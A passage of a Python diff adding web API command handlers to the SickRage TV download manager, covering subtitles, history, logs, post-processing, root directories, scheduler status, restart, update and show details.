for an episode subtitles. The response might take some time."", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + ""season"": {""desc"": ""The season number""}, + ""episode"": {""desc"": ""The episode number""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + self.s, args = self.check_params(args, kwargs, ""season"", None, True, ""int"", []) + self.e, args = self.check_params(args, kwargs, ""episode"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Search for an episode subtitles """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + # retrieve the episode object and fail if we can't get one + ep_obj = show_obj.getEpisode(int(self.s), int(self.e)) + if isinstance(ep_obj, str): + return _responds(RESULT_FAILURE, msg=""Episode not found"") + + # try do download subtitles for that episode + previous_subtitles = ep_obj.subtitles + + try: + subtitles = ep_obj.download_subtitles() + except Exception: + return _responds(RESULT_FAILURE, msg='Unable to find subtitles') + + # return the correct json value + new_subtitles = frozenset(ep_obj.subtitles).difference(previous_subtitles) + if new_subtitles: + new_languages = [subtitles.name_from_code(code) for code in new_subtitles] + status = 'New subtitles downloaded: %s' % ', '.join(new_languages) + response = _responds(RESULT_SUCCESS, msg='New subtitles found') + else: + status = 'No subtitles downloaded' + response = _responds(RESULT_FAILURE, msg='Unable to find subtitles') + + ui.notifications.message('Subtitles Search', status) + + return response + + +class CMD_Exceptions(ApiCall): + _help = { + ""desc"": ""Get the scene exceptions for all or a given show"", + ""optionalParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, False, ""int"", []) + + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the scene exceptions for all or a given show """""" + my_db = db.DBConnection(""cache.db"", row_type=""dict"") + + if self.indexerid is None: + sql_results = my_db.select(""SELECT show_name, indexer_id AS 'indexerid' FROM scene_exceptions"") + scene_exceptions = {} + for row in sql_results: + indexerid = row[""indexerid""] + if indexerid not in scene_exceptions: + scene_exceptions[indexerid] = [] + scene_exceptions[indexerid].append(row[""show_name""]) + + else: + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + sql_results = my_db.select( + ""SELECT show_name, indexer_id AS 'indexerid' FROM scene_exceptions WHERE indexer_id = ?"", + [self.indexerid]) + scene_exceptions = [] + for row in sql_results: + scene_exceptions.append(row[""show_name""]) + + return _responds(RESULT_SUCCESS, scene_exceptions) + + +class CMD_History(ApiCall): + _help = { + ""desc"": ""Get the downloaded and/or snatched history"", + ""optionalParameters"": { + ""limit"": {""desc"": ""The maximum number of results to return""}, + ""type"": {""desc"": ""Only get some entries. No value will returns every type""}, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.limit, args = self.check_params(args, kwargs, ""limit"", 100, False, ""int"", []) + self.type, args = self.check_params(args, kwargs, ""type"", None, False, ""string"", [""downloaded"", ""snatched""]) + self.type = self.type.lower() if isinstance(self.type, str) else '' + + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the downloaded and/or snatched history """""" + data = History().get(self.limit, self.type) + results = [] + + for row in data: + status, quality = Quality.splitCompositeStatus(int(row[""action""])) + status = _get_status_strings(status) + + if self.type and not status.lower() == self.type: + continue + + row[""status""] = status + row[""quality""] = get_quality_string(quality) + row[""date""] = _history_date_to_datetime_form(str(row[""date""])) + + del row[""action""] + + _rename_element(row, ""show_id"", ""indexerid"") + row[""resource_path""] = ek(os.path.dirname, row[""resource""]) + row[""resource""] = ek(os.path.basename, row[""resource""]) + + # Add tvdbid for backward compatibility + row['tvdbid'] = row['indexerid'] + results.append(row) + + return _responds(RESULT_SUCCESS, results) + + +class CMD_HistoryClear(ApiCall): + _help = {""desc"": ""Clear the entire history""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Clear the entire history """""" + History().clear() + + return _responds(RESULT_SUCCESS, msg=""History cleared"") + + +class CMD_HistoryTrim(ApiCall): + _help = {""desc"": ""Trim history entries older than 30 days""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Trim history entries older than 30 days """""" + History().trim() + + return _responds(RESULT_SUCCESS, msg='Removed history entries older than 30 days') + + +class CMD_Failed(ApiCall): + _help = { + ""desc"": ""Get the failed downloads"", + ""optionalParameters"": { + ""limit"": {""desc"": ""The maximum number of results to return""}, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.limit, args = self.check_params(args, kwargs, ""limit"", 100, False, ""int"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the failed downloads """""" + + my_db = db.DBConnection('failed.db', row_type=""dict"") + + u_limit = min(int(self.limit), 100) + if u_limit == 0: + sql_results = my_db.select(""SELECT * FROM failed"") + else: + sql_results = my_db.select(""SELECT * FROM failed LIMIT ?"", [u_limit]) + + return _responds(RESULT_SUCCESS, sql_results) + + +class CMD_Backlog(ApiCall): + _help = {""desc"": ""Get the backlogged episodes""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the backlogged episodes """""" + + shows = [] + + my_db = db.DBConnection(row_type=""dict"") + for curShow in sickbeard.showList: + + show_eps = [] + + sql_results = my_db.select( + ""SELECT tv_episodes.*, tv_shows.paused FROM tv_episodes INNER JOIN tv_shows ON tv_episodes.showid = tv_shows.indexer_id WHERE showid = ? and paused = 0 ORDER BY season DESC, episode DESC"", + [curShow.indexerid]) + + for curResult in sql_results: + + cur_ep_cat = curShow.getOverview(int(curResult[""status""] or -1)) + if cur_ep_cat and cur_ep_cat in (Overview.WANTED, Overview.QUAL): + show_eps.append(curResult) + + if show_eps: + shows.append({ + ""indexerid"": curShow.indexerid, + ""show_name"": curShow.name, + ""status"": curShow.status, + ""episodes"": show_eps + }) + + return _responds(RESULT_SUCCESS, shows) + + +class CMD_Logs(ApiCall): + _help = { + ""desc"": ""Get the logs"", + ""optionalParameters"": { + ""min_level"": { + ""desc"": + ""The minimum level classification of log entries to return. "" + ""Each level inherits its above levels: debug < info < warning < error"" + }, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.min_level, args = self.check_params(args, kwargs, ""min_level"", ""error"", False, ""string"", + [""error"", ""warning"", ""info"", ""debug""]) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the logs """""" + # 10 = Debug / 20 = Info / 30 = Warning / 40 = Error + min_level = logger.reverseNames[str(self.min_level).upper()] + + data = [] + if ek(os.path.isfile, logger.logFile): + with io.open(logger.logFile, 'r', encoding='utf-8') as f: + data = f.readlines() + + regex = r""^(\d\d\d\d)\-(\d\d)\-(\d\d)\s*(\d\d)\:(\d\d):(\d\d)\s*([A-Z]+)\s*(.+?)\s*\:\:\s*(.*)$"" + + final_data = [] + + num_lines = 0 + last_line = False + num_to_show = min(50, len(data)) + + for x in reversed(data): + + match = re.match(regex, x) + + if match: + level = match.group(7) + if level not in logger.reverseNames: + last_line = False + continue + + if logger.reverseNames[level] >= min_level: + last_line = True + final_data.append(x.rstrip(""\n"")) + else: + last_line = False + continue + + elif last_line: + final_data.append(""AA"" + x) + + num_lines += 1 + + if num_lines >= num_to_show: + break + + return _responds(RESULT_SUCCESS, final_data) + + +class CMD_PostProcess(ApiCall): + _help = { + ""desc"": ""Manually post-process the files in the download folder"", + ""optionalParameters"": { + ""path"": {""desc"": ""The path to the folder to post-process""}, + ""force_replace"": {""desc"": ""Force already post-processed files to be post-processed again""}, + ""return_data"": {""desc"": ""Returns the result of the post-process""}, + ""process_method"": {""desc"": ""How should valid post-processed files be handled""}, + ""is_priority"": {""desc"": ""Replace the file even if it exists in a higher quality""}, + ""failed"": {""desc"": ""Mark download as failed""}, + ""type"": {""desc"": ""The type of post-process being requested""}, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.path, args = self.check_params(args, kwargs, ""path"", None, False, ""string"", []) + self.force_replace, args = self.check_params(args, kwargs, ""force_replace"", False, False, ""bool"", []) + self.return_data, args = self.check_params(args, kwargs, ""return_data"", False, False, ""bool"", []) + self.process_method, args = self.check_params(args, kwargs, ""process_method"", False, False, ""string"", + [""copy"", ""symlink"", ""hardlink"", ""move""]) + self.is_priority, args = self.check_params(args, kwargs, ""is_priority"", False, False, ""bool"", []) + self.failed, args = self.check_params(args, kwargs, ""failed"", False, False, ""bool"", []) + self.type, args = self.check_params(args, kwargs, ""type"", ""auto"", None, ""string"", [""auto"", ""manual""]) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Manually post-process the files in the download folder """""" + if not self.path and not sickbeard.TV_DOWNLOAD_DIR: + return _responds(RESULT_FAILURE, msg=""You need to provide a path or set TV Download Dir"") + + if not self.path: + self.path = sickbeard.TV_DOWNLOAD_DIR + + if not self.type: + self.type = 'manual' + + data = processTV.processDir(self.path, process_method=self.process_method, force=self.force_replace, + is_priority=self.is_priority, failed=self.failed, proc_type=self.type) + + if not self.return_data: + data = """" + + return _responds(RESULT_SUCCESS, data=data, msg=""Started post-process for %s"" % self.path) + + +class CMD_SickBeard(ApiCall): + _help = {""desc"": ""Get miscellaneous information about SickRage""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" dGet miscellaneous information about SickRage """""" + data = {""sr_version"": sickbeard.BRANCH, ""api_version"": self.version, + ""api_commands"": sorted(function_mapper.keys())} + return _responds(RESULT_SUCCESS, data) + + +class CMD_SickBeardAddRootDir(ApiCall): + _help = { + ""desc"": ""Add a new root (parent) directory to SickRage"", + ""requiredParameters"": { + ""location"": {""desc"": ""The full path to the new root (parent) directory""}, + }, + ""optionalParameters"": { + ""default"": {""desc"": ""Make this new location the default root (parent) directory""}, + } + } + + def __init__(self, args, kwargs): + # required + self.location, args = self.check_params(args, kwargs, ""location"", None, True, ""string"", []) + # optional + self.default, args = self.check_params(args, kwargs, ""default"", False, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Add a new root (parent) directory to SickRage """""" + + self.location = urllib.unquote_plus(self.location) + location_matched = 0 + index = 0 + + # disallow adding/setting an invalid dir + if not ek(os.path.isdir, self.location): + return _responds(RESULT_FAILURE, msg=""Location is invalid"") + + root_dirs = [] + + if sickbeard.ROOT_DIRS == """": + self.default = 1 + else: + root_dirs = sickbeard.ROOT_DIRS.split('|') + index = int(sickbeard.ROOT_DIRS.split('|')[0]) + root_dirs.pop(0) + # clean up the list - replace %xx escapes by their single-character equivalent + root_dirs = [urllib.unquote_plus(x) for x in root_dirs] + for x in root_dirs: + if x == self.location: + location_matched = 1 + if self.default == 1: + index = root_dirs.index(self.location) + break + + if location_matched == 0: + if self.default == 1: + root_dirs.insert(0, self.location) + else: + root_dirs.append(self.location) + + root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs] + root_dirs_new.insert(0, index) + root_dirs_new = '|'.join(unicode(x) for x in root_dirs_new) + + sickbeard.ROOT_DIRS = root_dirs_new + return _responds(RESULT_SUCCESS, _get_root_dirs(), msg=""Root directories updated"") + + +class CMD_SickBeardCheckVersion(ApiCall): + _help = {""desc"": ""Check if a new version of SickRage is available""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + check_version = CheckVersion() + needs_update = check_version.check_for_new_version() + + data = { + ""current_version"": { + ""branch"": check_version.get_branch(), + ""commit"": check_version.updater.get_cur_commit_hash(), + ""version"": check_version.updater.get_cur_version(), + }, + ""latest_version"": { + ""branch"": check_version.get_branch(), + ""commit"": check_version.updater.get_newest_commit_hash(), + ""version"": check_version.updater.get_newest_version(), + }, + ""commits_offset"": check_version.updater.get_num_commits_behind(), + ""needs_update"": needs_update, + } + + return _responds(RESULT_SUCCESS, data) + + +class CMD_SickBeardCheckScheduler(ApiCall): + _help = {""desc"": ""Get information about the scheduler""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get information about the scheduler """""" + my_db = db.DBConnection() + sql_results = my_db.select(""SELECT last_backlog FROM info"") + + backlog_paused = sickbeard.searchQueueScheduler.action.is_backlog_paused() # @UndefinedVariable + backlog_running = sickbeard.searchQueueScheduler.action.is_backlog_in_progress() # @UndefinedVariable + next_backlog = sickbeard.backlogSearchScheduler.nextRun().strftime(dateFormat).decode(sickbeard.SYS_ENCODING) + + data = {""backlog_is_paused"": int(backlog_paused), ""backlog_is_running"": int(backlog_running), + ""last_backlog"": _ordinal_to_date_form(sql_results[0][""last_backlog""]), + ""next_backlog"": next_backlog} + return _responds(RESULT_SUCCESS, data) + + +class CMD_SickBeardDeleteRootDir(ApiCall): + _help = { + ""desc"": ""Delete a root (parent) directory from SickRage"", + ""requiredParameters"": { + ""location"": {""desc"": ""The full path to the root (parent) directory to remove""}, + } + } + + def __init__(self, args, kwargs): + # required + self.location, args = self.check_params(args, kwargs, ""location"", None, True, ""string"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Delete a root (parent) directory from SickRage """""" + if sickbeard.ROOT_DIRS == """": + return _responds(RESULT_FAILURE, _get_root_dirs(), msg=""No root directories detected"") + + new_index = 0 + root_dirs_new = [] + root_dirs = sickbeard.ROOT_DIRS.split('|') + index = int(root_dirs[0]) + root_dirs.pop(0) + # clean up the list - replace %xx escapes by their single-character equivalent + root_dirs = [urllib.unquote_plus(x) for x in root_dirs] + old_root_dir = root_dirs[index] + for curRootDir in root_dirs: + if not curRootDir == self.location: + root_dirs_new.append(curRootDir) + else: + new_index = 0 + + for curIndex, curNewRootDir in enumerate(root_dirs_new): + if curNewRootDir is old_root_dir: + new_index = curIndex + break + + root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs_new] + if len(root_dirs_new) > 0: + root_dirs_new.insert(0, new_index) + root_dirs_new = ""|"".join(unicode(x) for x in root_dirs_new) + + sickbeard.ROOT_DIRS = root_dirs_new + # what if the root dir was not found? + return _responds(RESULT_SUCCESS, _get_root_dirs(), msg=""Root directory deleted"") + + +class CMD_SickBeardGetDefaults(ApiCall): + _help = {""desc"": ""Get SickRage's user default configuration value""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get SickRage's user default configuration value """""" + + any_qualities, best_qualities = _map_quality(sickbeard.QUALITY_DEFAULT) + + data = {""status"": statusStrings[sickbeard.STATUS_DEFAULT].lower(), + ""flatten_folders"": int(sickbeard.FLATTEN_FOLDERS_DEFAULT), ""initial"": any_qualities, + ""archive"": best_qualities, ""future_show_paused"": int(sickbeard.COMING_EPS_DISPLAY_PAUSED)} + return _responds(RESULT_SUCCESS, data) + + +class CMD_SickBeardGetMessages(ApiCall): + _help = {""desc"": ""Get all messages""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + messages = [] + for cur_notification in ui.notifications.get_notifications(self.rh.request.remote_ip): + messages.append({""title"": cur_notification.title, + ""message"": cur_notification.message, + ""type"": cur_notification.type}) + return _responds(RESULT_SUCCESS, messages) + + +class CMD_SickBeardGetRootDirs(ApiCall): + _help = {""desc"": ""Get all root (parent) directories""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get all root (parent) directories """""" + + return _responds(RESULT_SUCCESS, _get_root_dirs()) + + +class CMD_SickBeardPauseBacklog(ApiCall): + _help = { + ""desc"": ""Pause or un-pause the backlog search"", + ""optionalParameters"": { + ""pause "": {""desc"": ""True to pause the backlog search, False to un-pause it""} + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.pause, args = self.check_params(args, kwargs, ""pause"", False, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Pause or un-pause the backlog search """""" + if self.pause: + sickbeard.searchQueueScheduler.action.pause_backlog() # @UndefinedVariable + return _responds(RESULT_SUCCESS, msg=""Backlog paused"") + else: + sickbeard.searchQueueScheduler.action.unpause_backlog() # @UndefinedVariable + return _responds(RESULT_SUCCESS, msg=""Backlog un-paused"") + + +class CMD_SickBeardPing(ApiCall): + _help = {""desc"": ""Ping SickRage to check if it is running""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Ping SickRage to check if it is running """""" + if sickbeard.started: + return _responds(RESULT_SUCCESS, {""pid"": sickbeard.PID}, ""Pong"") + else: + return _responds(RESULT_SUCCESS, msg=""Pong"") + + +class CMD_SickBeardRestart(ApiCall): + _help = {""desc"": ""Restart SickRage""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Restart SickRage """""" + if not Restart.restart(sickbeard.PID): + return _responds(RESULT_FAILURE, msg='SickRage can not be restarted') + + return _responds(RESULT_SUCCESS, msg=""SickRage is restarting..."") + + +class CMD_SickBeardSearchIndexers(ApiCall): + _help = { + ""desc"": ""Search for a show with a given name on all the indexers, in a specific language"", + ""optionalParameters"": { + ""name"": {""desc"": ""The name of the show you want to search for""}, + ""indexerid"": {""desc"": ""Unique ID of a show""}, + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""lang"": {""desc"": ""The 2-letter language code of the desired show""}, + } + } + + def __init__(self, args, kwargs): + self.valid_languages = sickbeard.indexerApi().config['langabbv_to_id'] + # required + # optional + self.name, args = self.check_params(args, kwargs, ""name"", None, False, ""string"", []) + self.lang, args = self.check_params(args, kwargs, ""lang"", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, ""string"", + self.valid_languages.keys()) + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, False, ""int"", []) + + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Search for a show with a given name on all the indexers, in a specific language """""" + + results = [] + lang_id = self.valid_languages[self.lang] + + if self.name and not self.indexerid: # only name was given + for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]: + indexer_api_params = sickbeard.indexerApi(_indexer).api_params.copy() + + if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE: + indexer_api_params['language'] = self.lang + + indexer_api_params['actors'] = False + indexer_api_params['custom_ui'] = classes.AllShowsListUI + + t = sickbeard.indexerApi(_indexer).indexer(**indexer_api_params) + + try: + api_data = t[str(self.name).encode()] + except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error): + logger.log(u""API :: Unable to find show with id "" + str(self.indexerid), logger.WARNING) + continue + + for curSeries in api_data: + results.append({indexer_ids[_indexer]: int(curSeries['id']), + ""name"": curSeries['seriesname'], + ""first_aired"": curSeries['firstaired'], + ""indexer"": int(_indexer)}) + + return _responds(RESULT_SUCCESS, {""results"": results, ""langid"": lang_id}) + + elif self.indexerid: + for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]: + indexer_api_params = sickbeard.indexerApi(_indexer).api_params.copy() + + if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE: + indexer_api_params['language'] = self.lang + + indexer_api_params['actors'] = False + + t = sickbeard.indexerApi(_indexer).indexer(**indexer_api_params) + + try: + my_show = t[int(self.indexerid)] + except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error): + logger.log(u""API :: Unable to find show with id "" + str(self.indexerid), logger.WARNING) + return _responds(RESULT_SUCCESS, {""results"": [], ""langid"": lang_id}) + + if not my_show.data['seriesname']: + logger.log( + u""API :: Found show with indexerid: "" + str( + self.indexerid) + "", however it contained no show name"", logger.DEBUG) + return _responds(RESULT_FAILURE, msg=""Show contains no name, invalid result"") + + # found show + results = [{indexer_ids[_indexer]: int(my_show.data['id']), + ""name"": unicode(my_show.data['seriesname']), + ""first_aired"": my_show.data['firstaired'], + ""indexer"": int(_indexer)}] + break + + return _responds(RESULT_SUCCESS, {""results"": results, ""langid"": lang_id}) + else: + return _responds(RESULT_FAILURE, msg=""Either a unique id or name is required!"") + + +class CMD_SickBeardSearchTVDB(CMD_SickBeardSearchIndexers): + _help = { + ""desc"": ""Search for a show with a given name on The TVDB, in a specific language"", + ""optionalParameters"": { + ""name"": {""desc"": ""The name of the show you want to search for""}, + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""lang"": {""desc"": ""The 2-letter language code of the desired show""}, + } + } + + def __init__(self, args, kwargs): + CMD_SickBeardSearchIndexers.__init__(self, args, kwargs) + self.indexerid, args = self.check_params(args, kwargs, ""tvdbid"", None, False, ""int"", []) + + +class CMD_SickBeardSearchTVRAGE(CMD_SickBeardSearchIndexers): + """""" + Deprecated, TVRage is no more. + """""" + + _help = { + ""desc"": + ""Search for a show with a given name on TVRage, in a specific language. "" + ""This command should not longer be used, as TVRage was shut down."", + ""optionalParameters"": { + ""name"": {""desc"": ""The name of the show you want to search for""}, + ""lang"": {""desc"": ""The 2-letter language code of the desired show""}, + } + } + + def __init__(self, args, kwargs): + # Leave this one as APICall so it doesnt try and search anything + # pylint: disable=W0233,W0231 + ApiCall.__init__(self, args, kwargs) + + def run(self): + return _responds(RESULT_FAILURE, msg=""TVRage is no more, invalid result"") + + +class CMD_SickBeardSetDefaults(ApiCall): + _help = { + ""desc"": ""Set SickRage's user default configuration value"", + ""optionalParameters"": { + ""initial"": {""desc"": ""The initial quality of a show""}, + ""archive"": {""desc"": ""The archive quality of a show""}, + ""future_show_paused"": {""desc"": ""True to list paused shows in the coming episode, False otherwise""}, + ""flatten_folders"": {""desc"": ""Flatten sub-folders within the show directory""}, + ""status"": {""desc"": ""Status of missing episodes""}, + } + } + + def __init__(self, args, kwargs): + # required + # optional + self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"", + [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""]) + self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"", + [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray""]) + self.future_show_paused, args = self.check_params(args, kwargs, ""future_show_paused"", None, False, ""bool"", []) + self.flatten_folders, args = self.check_params(args, kwargs, ""flatten_folders"", None, False, ""bool"", []) + self.status, args = self.check_params(args, kwargs, ""status"", None, False, ""string"", + [""wanted"", ""skipped"", ""ignored""]) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Set SickRage's user default configuration value """""" + + quality_map = {'sdtv': Quality.SDTV, + 'sddvd': Quality.SDDVD, + 'hdtv': Quality.HDTV, + 'rawhdtv': Quality.RAWHDTV, + 'fullhdtv': Quality.FULLHDTV, + 'hdwebdl': Quality.HDWEBDL, + 'fullhdwebdl': Quality.FULLHDWEBDL, + 'hdbluray': Quality.HDBLURAY, + 'fullhdbluray': Quality.FULLHDBLURAY, + 'unknown': Quality.UNKNOWN} + + i_quality_id = [] + a_quality_id = [] + + if self.initial: + for quality in self.initial: + i_quality_id.append(quality_map[quality]) + if self.archive: + for quality in self.archive: + a_quality_id.append(quality_map[quality]) + + if i_quality_id or a_quality_id: + sickbeard.QUALITY_DEFAULT = Quality.combineQualities(i_quality_id, a_quality_id) + + if self.status: + # convert the string status to a int + for status in statusStrings: + if statusStrings[status].lower() == str(self.status).lower(): + self.status = status + break + # this should be obsolete because of the above + if self.status not in statusStrings: + raise ApiError(""Invalid Status"") + # only allow the status options we want + if int(self.status) not in (3, 5, 6, 7): + raise ApiError(""Status Prohibited"") + sickbeard.STATUS_DEFAULT = self.status + + if self.flatten_folders is not None: + sickbeard.FLATTEN_FOLDERS_DEFAULT = int(self.flatten_folders) + + if self.future_show_paused is not None: + sickbeard.COMING_EPS_DISPLAY_PAUSED = int(self.future_show_paused) + + return _responds(RESULT_SUCCESS, msg=""Saved defaults"") + + +class CMD_SickBeardShutdown(ApiCall): + _help = {""desc"": ""Shutdown SickRage""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Shutdown SickRage """""" + if not Shutdown.stop(sickbeard.PID): + return _responds(RESULT_FAILURE, msg='SickRage can not be shut down') + + return _responds(RESULT_SUCCESS, msg=""SickRage is shutting down..."") + + +class CMD_SickBeardUpdate(ApiCall): + _help = {""desc"": ""Update SickRage to the latest version available""} + + def __init__(self, args, kwargs): + # required + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + check_version = CheckVersion() + + if check_version.check_for_new_version(): + if check_version.run_backup_if_safe(): + check_version.update() + + return _responds(RESULT_SUCCESS, msg=""SickRage is updating ..."") + + return _responds(RESULT_FAILURE, msg=""SickRage could not backup config ..."") + + return _responds(RESULT_FAILURE, msg=""SickRage is already up to date"") + + +class CMD_Show(ApiCall): + _help = { + ""desc"": ""Get detailed information about a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get detailed information about a show """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + show_dict = { + ""season_list"": CMD_ShowSeasonList((), {""indexerid"": self.indexerid}).run()[""data""], + ""cache"": CMD_ShowCache((), {""indexerid"": self.indexerid}).run()[""data""] + } + + genre_list = [] + if show_obj.genre: + genre_list_tmp = show_obj.genre.split(""|"") + for genre in genre_list_tmp: + if genre: + genre_list.append(genre) + + show_dict[""genre""] = genre_list + show_dict[""quality""] = get_quality_string(show_obj.quality) + + any_qualities, best_qualities = _map_quality(show_obj.quality) + show_dict[""quality_details""] = {""initial"": any_qualities, ""archive"": best_qualities} + + try: + show_dict[""location""] = show_obj.location + except ShowDirectoryNotFoundException: + show_dict[""location""] = """" + + show_dict[""language""] = show_obj.lang + show_dict[""show_name""] = show_obj.name + show_dict[""paused""] = (0, 1)[show_obj.paused] + show_dict[""subtitles""] = (0, 1)[show_obj.subtitles] + show_dict[""air_by_date""] = (0, 1)[show_obj.air_by_date] + show_dict[""flatten_folders""] = (0, 1)[show_obj.flatten_folders] + show_dict[""sports""] = (0, 1)[show_obj.sports] + show_dict[""anime""] = (0, 1)[show_obj.anime] + show_dict[""airs""] = str(show_obj.airs).replace('am', ' AM').replace('pm', ' PM').replace(' ', ' ') + show_dict[""dvdorder""] = (0, 1)[show_obj.dvdorder] + + if show_obj.rls_require_words: + show_dict[""rls_require_words""] = show_obj.rls_require_words.split("", "") + else: + show_dict[""rls_require_words""] = [] + + if show_obj.rls_ignore_words: + show_dict[""rls_ignore_words""] = show_obj.rls_ignore_words.split("", "") + else: + show_dict[""rls_ignore_words""] = [] + + show_dict[""scene""] = (0, 1)[show_obj.scene] + show_dict[""archive_firstmatch""] = (0, 1)[show_obj.archive_firstmatch] + + show_dict[""indexerid""] = show_obj.indexerid + show_dict[""tvdbid""] = helpers.mapIndexersToShow(show_obj)[1] + show_dict[""imdbid""] = show_obj.imdbid + + show_dict[""network""] = show_obj.network + if not show_dict[""network""]: + show_dict[""network""] = """" + show_dict[""status""] = show_obj.status + + if helpers.tryInt(show_obj.nextaired, 1) > 693595: + dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting( + network_timezones.parse_date_time(show_obj.nextaired, show_dict['airs'], show_dict['network'])) + show_dict['airs'] = sbdatetime.sbdatetime.sbftime(dt_episode_airs, t_preset=timeFormat).lstrip('0').replace( + ' 0', ' ') + show_dict['next_ep_airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat) + else: + show_dict['next_ep_airdate'] = '' + + return _responds(RESULT_SUCCESS, show_dict) + + +class CMD_ShowAddExisting(ApiCall): + _help = { + ""desc"": ""Add an existing show in SickRage"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + ""location"": {""desc"": ""Full path to the existing shows's folder""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""initial"": {""desc"": ""The initial quality of the show""}, + ""archive"": {""desc"": ""The archive quality of the show""}, + ""flatten_folders"": {""desc"": ""True to flatten the show folder, False otherwise""}, + ""subtitles"": {""desc"": ""True to search for subtitles, False otherwise""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, """", []) + self.location, args = self.check_params(args, kwargs, ""location"", None, True, ""string"", []) + # optional + self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"", + [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", 